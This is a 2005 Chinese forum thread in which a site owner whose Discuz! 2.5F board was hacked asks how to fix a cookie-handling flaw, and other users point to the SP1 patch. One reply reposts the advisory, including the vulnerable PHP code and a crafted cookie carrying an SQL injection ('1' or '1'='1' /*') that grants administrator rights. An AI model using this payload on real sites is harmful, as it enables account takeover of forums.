Discuz! 2.5F cookie未过滤漏洞，如何防？

gdvip · 发表于 2005-7-27 12:58:45

Discuz! 2.5F新版论坛 COOKIE未过滤通过本地构造可获取管理员权限

这个漏洞如何防，我的论坛被人黑了，现在很急～～哪位高手帮帮我

168funpc · 发表于 2005-7-27 13:08:03

gdvip · 发表于 2005-7-27 13:49:25

下载地址：
http://download.discuz.net/2.5/Discuz!_2.5F_SP1_gb.zip（0311）(简体中文 gbk)
http://download.discuz.net/2.5/Discuz!_2.5F_SP1_big5.zip (繁体中文 big5)

附件: [Discuz!_2.5_SP1_050401] Discuz!_2.5_SP1_gb_050401.zip (2005-3-11 15:15, 633.87 K)

从上官方发布的下载贴里的下载地址，请问：

Discuz!_2.5F_SP1_gb.zip 和 Discuz!_2.5_SP1_gb_050401.zip

它们的大小分别是629K,634K，这2个下载的版本有什么不同之处，下载哪个较好?谢谢

童虎 · 发表于 2005-7-27 16:31:36

你的论坛究竟是怎么被黑的，具体原因清楚了吗？

gdvip · 发表于 2005-7-27 17:18:48

应该是这个

Discuz! 2.5F cookie未过滤漏洞

http://www.51one.net/create/other/20050713144941.htm

发现日期是：2005-7-13

请看看～～有详细的介绍

油葫芦 · 发表于 2005-7-29 17:30:33

怎么黑掉的？
不是我干的```嘿嘿`

纳米 · 发表于 2005-7-30 10:59:14

这东西早就修改了
用Discuz!2.5 SP1就没事了

这个bug 4、5个月前已经公开了，这网站现在才发布。。。。

7821小雨 · 发表于 2005-8-20 04:13:55

漏洞提供：火狐技术联盟－我非我 [www.wrsky.com]

漏洞说明：
Discuz! 2.5F新版论坛 COOKIE未过滤通过本地构造可获取管理员权限

具体描述：
文件include\common.php中87行

=================================code begin==========================================================
$discuz_uid = $_COOKIE['_discuz_uid']; //这里没有进行过滤检测
$discuz_pw = $_COOKIE['_discuz_pw'];
$discuz_secques = $_COOKIE['_discuz_secques'];

$newpm = $newpmexists = $sessionexists = $adminid = $adminglobal = 0;

$userinfo="m.uid AS discuz_uid, m.username AS discuz_user, m.password AS discuz_pw, m.adminid, m.groupid, m.email, m.timeoffset,m.tpp, m.ppp, m.credit, m.timeformat, m.dateformat, m.signature, m.invisible, m.lastvisit, m.lastpost, m.newpm, m.accessmasks, m.regdate";
//这里直接就放入mysql执行了..
if($sid) {
if($discuz_uid) {
$query = $db->query("SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, $userinfo FROM $table_sessions s, $table_members m WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid' AND m.password='$discuz_pw' AND m.secques='$discuz_secques'");
} else {
$query = $db->query("SELECT sid, uid AS sessionuid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
}
if($_DSESSION = $db->fetch_array($query)) {
$sessionexists = 1;
if(!empty($_DSESSION['sessionuid'])) {
$query = $db->query("SELECT $userinfo FROM $table_members m WHERE uid='$_DSESSION[sessionuid]'");
$_DSESSION = array_merge($_DSESSION, $db->fetch_array($query));
}
} else {
$query = $db->query("SELECT sid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
if($_DSESSION = $db->fetch_array($query)) {
clearcookies();
$sessionexists = 1;
}
}
}
if(!$sessionexists) {

..........................................

====================================code end==========================================================

本地cookie构造方式：

sid=dAgM7P; _cookietime=2592000; expand_menu=0__3; _discuz_uid=1' or '1'='1' /*; _discuz_pw=wofeiwo; _discuz_secques=hehe

漏洞演示动画下载：

http://down.juntuan.net/data/soft/778.html

		自动登录	找回密码
密码			立即注册

Discuz! 2.5F cookie未过滤漏洞，如何防？

到发布区下载 discuz 2.5 sp1